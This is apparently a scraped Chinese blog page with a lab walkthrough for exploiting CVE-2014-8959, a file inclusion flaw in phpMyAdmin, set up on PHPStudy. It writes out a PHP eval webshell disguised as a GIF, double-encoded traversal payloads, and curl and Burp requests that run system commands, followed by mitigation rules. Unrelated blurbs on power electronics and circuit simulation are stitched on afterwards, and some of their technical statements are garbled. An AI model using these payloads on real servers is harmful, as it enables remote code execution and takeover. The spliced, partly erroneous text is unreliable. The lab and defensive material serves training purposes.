老漏洞新玩法:手把手复现CVE-2014-8959,在Windows上用PHPStudy搭建phpMyAdmin靶场

从零构建CVE-2014-8959靶场:PHPStudy环境下的phpMyAdmin文件包含实战

当我在整理企业内网渗透测试培训材料时,发现许多初学者对文件包含漏洞的理解停留在理论层面。于是决定用这个经典的CVE-2014-8959漏洞作为教学案例,带大家从环境搭建到漏洞利用走完整个流程。不同于简单的漏洞演示,我们将重点解决Windows系统下使用PHPStudy可能遇到的各种"坑"。

1. 环境准备与靶场搭建

1.1 组件版本选择

在Windows 10系统上使用PHPStudy 2018版本进行测试时,发现不同PHP版本对漏洞复现成功率有显著影响。经过多次尝试,推荐以下组合:

组件 推荐版本 替代方案 注意事项
PHPStudy v2018 v2021 需关闭PHP的open_basedir限制
PHP 5.4.45 5.2.17 确保register_argc_argv=On
phpMyAdmin 4.0.10.10 4.0.x系列 不要使用5.x以上版本
MySQL 5.5.53 5.0+ 仅需基础服务运行

安装完成后,需要特别检查php.ini中的两个关键配置:

allow_url_include = On
allow_url_fopen = On

1.2 目录结构配置

许多复现失败案例源于错误的文件放置位置。建议按以下结构组织:

phpStudy
├── PHPTutorial
│   ├── WWW
│   │   ├── pma          # phpMyAdmin主目录
│   │   │   └── ...
│   │   └── 1.gif        # 恶意GIF文件
│   └── Apache
└── tmp                  # 系统临时目录

在WWW根目录下创建1.gif文件时,Windows记事本可能会自动添加BOM头导致解析失败。推荐使用Notepad++保存为UTF-8无BOM格式:

<?php @eval($_POST['a']);?>

2. 漏洞原理深度解析

2.1 二次编码绕过机制

这个漏洞的精妙之处在于它对编码处理的缺陷。正常文件包含防护会检查路径中的 ../ 等危险字符,但当我们对payload进行双重URL编码时:

原始payload:

/../../../../1.gif

第一次编码:

%2F..%2F..%2F..%2F..%2F1.gif

第二次编码:

%252F..%252F..%252F..%252F..%252F1.gif

防护系统解码第一次后看到的是无害的 %2F (被当作普通字符),而PHP最终执行时才会解析出真实的路径穿越符。

2.2 Token获取的三种方式

  1. 页面源码提取法 : 在登录后的页面HTML中搜索 token= 参数

  2. Cookie解析法

    document.cookie.match(/pmaToken=([^;]+)/)[1]
    
  3. BurpSuite拦截法 : 在Proxy → HTTP history中筛选 pma 请求

3. 分步复现操作指南

3.1 基础利用流程

  1. 登录phpMyAdmin后台(默认地址 http://localhost/pma
  2. 获取当前会话token值
  3. 构造恶意URL:
    http://localhost/pma/gis_data_editor.php?token=[YOUR_TOKEN]&gis_data[gis_type]=/../../../../1.gif%00
    
  4. 使用HackTool或curl发送POST请求:
    curl -X POST -d "a=system('whoami');" "http://localhost/pma/gis_data_editor.php?..."
    

3.2 BurpSuite高级利用

对于需要复杂操作的情况,建议使用BurpSuite的Repeater模块:

  1. 拦截正常请求后右键发送到Repeater
  2. 修改参数为双重编码格式:
    gis_data[gis_type]=%252F..%252F..%252F..%252F..%252F1.gif%00
    
  3. 添加POST数据:
    a=echo shell_exec('type C:\\windows\\win.ini');
    

注意:Windows路径需要使用正斜杠或双反斜杠,如 C:/windows/system.ini C:\\windows\\system.ini

4. 常见问题解决方案

4.1 报错排查表

错误现象 可能原因 解决方案
500 Internal Server Error PHP版本过高 降级到PHP 5.4.x系列
空白页面无响应 open_basedir限制 修改php.ini相关设置
包含失败但无报错 路径层级不足 增加../到8-10层
被识别为非法操作 token过期 重新登录获取最新token
部分函数被禁用 disable_functions限制 使用其他未被禁用的函数替代

4.2 路径穿越深度测试

在Windows系统下,不同分区的路径穿越需要特别注意。通过以下方法测试包含深度:

// 测试包含语句
<?php
for($i=1;$i<=15;$i++){
    $path = str_repeat('../',$i).'1.gif';
    echo "尝试{$i}层: ".file_exists($path)."<br>";
}
?>

实际测试中发现,通常需要8-10层 ../ 才能到达根目录。如果包含失败,可以尝试:

/../../../../../../../../1.gif

5. 防御与加固建议

5.1 临时缓解措施

对于无法立即升级的系统,可通过以下方式防护:

  1. 在nginx配置中添加规则:

    location ~* \.php$ {
        if ($args ~* "\.\./") { return 403; }
    }
    
  2. 创建.htaccess防护(Apache):

    RewriteEngine On
    RewriteCond %{QUERY_STRING} (\.\./|\.\.%2f) [NC]
    RewriteRule .* - [F]
    

5.2 安全开发规范

  1. 所有包含操作必须限定基础目录:

    $base_dir = '/var/www/allow/';
    $path = realpath($base_dir . $_GET['file']);
    if(strpos($path, $base_dir) !== 0) {
        die('非法访问!');
    }
    
  2. 使用白名单验证文件类型:

    $allow_ext = ['jpg','png','gif'];
    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    if(!in_array($ext, $allow_ext)){
        die('不支持的文件类型');
    }
    

在最近一次内部攻防演练中,我们发现即使是最"古老"的漏洞,在特定环境下仍然具有杀伤力。建议每季度对测试环境进行漏洞扫描,及时更新组件版本。

内容概要:本文研究了计及碳排放的多微网电能交互分布式运行策略,提出了一种基于交替方向乘子法(ADMM)的优化方法,旨在实现多微电网系统在满足能源供需平衡的同时降低碳排放。文中构建了包含分布式电源、储能系统、可控负荷及碳排放约束的多微网协同优化模型,通过ADMM算法将全局优化问题分解为各微网子系统独立求解的子问题,实现分布式协同调度,在保障各微网自治性的同时兼顾系统整体的经济性与低碳性。研究通过Matlab代码完成了算法仿真,验证了所提策略在提升能源利用效率、减少碳排放、增强系统鲁棒性与可扩展性方面的有效性,为低碳化、去中心化的能源互联网运行提供了理论支持与实践参考。; 适合人群:具备电力系统分析、优化理论及Matlab编程基础的科研人员、电气工程及相关专业的研究生,以及从事智慧能源、分布式能源系统规划与运行的工程技术人员。; 使用场景及目标:①应用于多微电网系统的分布式能量管理与协同优化调度;②支持“双碳”目标下的低碳电网运行策略设计与政策评估;③为ADMM等分布式优化算法在能源系统中的工程化应用提供完整的模型构建、算法实现与仿真验证案例。; 阅读建议:读者应结合Matlab代码深入理解ADMM算法的迭代流程、拉格朗日函数构造与收敛条件设定,重点关注模型中碳排放因子的引入方式、变量分解机制与子问题求解过程,建议通过调整微网数量、碳价参数及通信拓扑结构进行多场景仿真,以深化对分布式协同机制与环保经济权衡关系的理解。
下载代码方式:https://pan.quark.cn/s/cc130f55eddd BUCK变换器,亦称为降压型转换器,在开关电源技术中属于一种基础电路拓扑,其核心功能在于实现从高电压到低电压的转换,并且在转换过程中确保输出端电压的稳定性。本文的核心内容集中在对BUCK变换器的运行机制进行剖析、阐释电流连续模式(CCM)与断续模式(DCM)之间的差异,并深入探讨这两种模式在稳态下的相互关系,同时研究BUCK变换器的交流等效电路模型以及电压与电流补偿回路的构建方法。BUCK变换器的原理示意图如图1所示,其显著特征在于输出电压值低于输入电压值,输出电流保持连续状态,而输入电流则呈现出脉动特性。变换器的工作过程可以划分为两个主要阶段:在第一个阶段,即开关管导通期间,电感元件负责储存能量,电流呈现出线性增长的趋势,并且同时向负载提供能量;在第二个阶段,即开关管截止期间,电感通过二极管实现能量的续流,电流则表现出线性递减的态势。依据电感元件的伏秒平衡原理,可以推导出涉及开关管占空比、电感元件电感量、输入电压以及输出电压之间关系的数学公式,这些公式对于深入理解和设计BUCK变换器具有关键性的指导意义。 接下来,文章对CCM和DCM两种模式进行了详细的比较分析。在CCM模式下,电感电流在整个开关周期内均保持连续的状态,而在DCM模式下,电感电流则会出现中断现象。确定BUCK变换器工作模式的关键依据是其电感电流纹波值与输出电流值相等这一边界条件。当电流纹波值等于零,即在整个开关周期内电感电流保持完全连续时,BUCK变换器被归类为CCM模式;相对地,若电流纹波值大于零,则表明变换器处于DCM模式;介于两者之间的情况则界定为CCM与DCM的过渡状态。 在DCM模式下,对BUCK...
源码链接: https://pan.quark.cn/s/ae09e867d64c S参数指的是散射参数,其英文全称为“Scattering-Parameter”。该参数用于表征电路网络中信号传输与反射的特性,是微波领域中衡量电路网络性能的核心指标。以二端口网络为例,比如单根传输线,其包含四个S参数,分别为S11、S12、S21和S22。其中,S11代表端口1的反射系数,S12代表端口1至端口2的反向传输系数,S21代表端口2至端口1的正向传输系数,而S22则表示端口2的反射系数。在高速电路设计领域,S参数是评估电路网络性能的关键依据。对于互易性网络,存在S12=S21的关系;对于对称性网络,满足S11=S22的条件;而对于无耗性网络,则有S11*S11+S21*S21=1,即网络不产生能量损耗,从端口1输入的能量要么被反射回端口1,要么被传输至端口2。在实际应用场景中,S参数能够用于评估电路网络的性能表现,例如,S11体现回波损耗,即有多少能量被反射回源端(Port1),该值越小越好,通常推荐S11<0.1,即-20dB。S21则反映插入损耗,即有多少能量被传输到目的端(Port2),该值越大越优,理想值为1,即0dB,传输效率越高,一般建议S21>0.7,即-3dB。此外,S参数还可用于判断电路网络的互易性与对称性。在高速电路设计过程中,这些参数具有显著意义,因为它们对电路网络的性能和稳定性具有直接影响。S参数是评估电路网络性能的核心指标,能够衡量电路网络的信号传输和反射能力,对于高速电路设计而言至关重要。关于Z参数和Smith圆图,Z参数属于阻抗参数,而Smith圆图是反射系数(以符号Γ表示)的极坐标图形。Smith圆图可用于评估电路网络的阻抗匹配状况...
内容概要:本文围绕基于序贯蒙特卡洛模拟法的配电网可靠性评估展开研究,系统阐述了该方法在电力系统中的应用原理与实现路径。通过Matlab代码实现了系统状态抽样、状态分析、可靠性指标计算等关键环节,并结合IEEE标准测试系统进行仿真验证,有效评估配电网在不同运行工况下的可靠性水平。研究不仅提供了完整的算法实现框架,还拓展至阶梯式碳交易、供需响应、N-k安全约束等多种复杂场景,体现了其在现代综合能源系统优化中的广泛适用性。配套资源丰富,涵盖多个电力系统前沿研究方向的技术实现与论文复现案例。; 适合人群:具备电力系统基础知识和Matlab编程能力的科研人员与工程技术人员,特别适用于从事配电网可靠性分析、综合能源系统优化、电力系统仿真等领域的高校研究生、科研机构研究人员及电力行业工程师。; 使用场景及目标:①掌握序贯蒙特卡洛模拟法在配电网可靠性评估中的建模与仿真方法;②学习利用Matlab进行电力系统随机模拟与数据分析;③为电网规划、运行风险评估及故障恢复策略制定提供量化依据;④拓展对智能优化算法、机器学习及多能协同调度在电力系统中集成应用的理解。; 阅读建议:此资源不仅提供可运行的Matlab代码,还融合了大量科研实践案例,建议读者结合文中仿真模型与实际算例进行动手复现,深入理解算法细节与工程背景,同时关注相关领域如微电网优化、故障诊断、路径规划等交叉技术的发展,以提升综合科研与工程应用能力。
源码直接下载地址: https://pan.quark.cn/s/9af8b9f95652 ### Multisim模型的导入和使用 ### 一、引言 随着电子设计自动化(EDA)工具的进步,Multisim已经成为电子工程师进行电路仿真、分析和设计的关键工具之一。借助Multisim,工程师们能够便捷地构建电路模型,并对电路进行仿真验证。本文将系统阐述如何在Multisim中导入并运用芯片仿真模型,这对于提升电子产品的研发效能具有显著价值。 ### 二、Multisim中构建元器件 构建元器件是Multisim中的核心功能,特别是对于那些需要特定模型或无法从Multisim库中直接获取的元器件来说更为关键。以下为构建元器件的具体流程: ##### 步骤1:录入元器件信息 在Multisim中启动“Component Wizard”,即元器件向导,开始创建的元器件。首先需要录入元器件的基本资料,包括型号、主要功能、类型等。这些资料将有助于用户更高效地管理和检索元器件。 ##### 步骤2:录入封装信息 接下来需要设定元器件的封装信息。在这一环节中,用户需要依据实际芯片的封装规格来选择适宜的引脚数量。同时,还需明确是构建单一部件元器件还是复合部件元器件。如果是复合部件元器件,则必须确保引脚数量与符号中使用的引脚数量保持一致。 ##### 步骤3:录入符号信息 在此步骤中,用户可以编辑元器件在仿真过程中的显示符号。编辑符号可以通过三种途径进行:直接编辑、从数据库中复制现有符号或复制当前符号以备将来使用。编辑符号时应注重其在电路图中的可辨识度和清晰度。 ##### 步骤4:设定管脚参数 在该步骤中,用户需要参照数据手册上的管脚顺序为每个管脚命名,并选择恰当的类型。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值